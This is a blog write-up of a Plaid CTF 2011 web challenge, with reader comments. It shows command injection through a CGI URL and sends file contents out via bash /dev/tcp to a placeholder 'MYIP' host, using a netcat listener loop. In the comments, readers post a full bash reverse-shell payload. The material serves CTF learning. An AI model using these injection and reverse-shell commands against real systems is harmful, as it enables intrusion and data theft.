Plaid CtF 2011 – Writeup #16
The Plaid Parliament of Pwning organized their own Capture-the-Flag (CtF) contest this past weekend. It was an excellent CtF with about 36 challenges ranging from trivia, exploitation, reverse engineering, web exploitation, cryptography, and forensics.
My writeup for #16 – Plain sight [200 pts] web
The problem was
The time to strike is now! This fiendish AED employee decided to hide secret data on this website (http://a4.amalgamated.biz/cgi-bin/chroot.cgi)
It seems that the employee was in the middle of creating the website when our operatives stumbled upon it.
The good news is that there are surely bugs in the development version of this problem, the bad news is currently no feedback printed to users.
Some of our leet operatives have determined a little bit about the machine: it runs in a read-only environment with only
bash cat dc expand grep hd head id less ls more nl od pr rev sh sleep sort sum tail tar tr true tsort ul wc yes
installed.Find what AED is hiding, good luck and godspeed.
There was a URL http://a4.amalgamated.biz/cgi-bin/chroot.cgi that allowed remote code execution.
bash, cat, less, more, ls were allowed.
First thing I did was checked if the bash TCP connections were allowed using:
http://a4.amalgamated.biz/cgi-bin/chroot.cgi?ls>/dev/tcp/MYIP/5000
That seemed to work. So then I listed the directories one by one until I bumped onto:
I used http://a4.amalgamated.biz/cgi-bin/chroot.cgi?cat%20keyfolder/key>/dev/tcp/MYIP/5000 I had the port forwarded to my PC and a netcat listener running in a loop
while [ 1 ]
do
nc -l -v -p 5000
done
The answer was esc4p3_str1ng5.
Fun times!
we made something similar, but with full shell i/o redirection and ncat
ncat -l -k -vv 6666 //never stops listening
http://a4.amalgamated.biz/cgi-bin/chroot.cgi?bash&/dev/tcp/IP/6666
two connections are established but works like a charm 🙂
Was this answer helpful?
LikeDislikecomment system did not correctly escape the simbols…
http://a4.amalgamated.biz/cgi-bin/chroot.cgi?bash</dev/tcp/MYIP/6666 >&/dev/tcp/MYIP/6666
(hope this time works!)
please remove the ips… 🙂
Was this answer helpful?
LikeDislike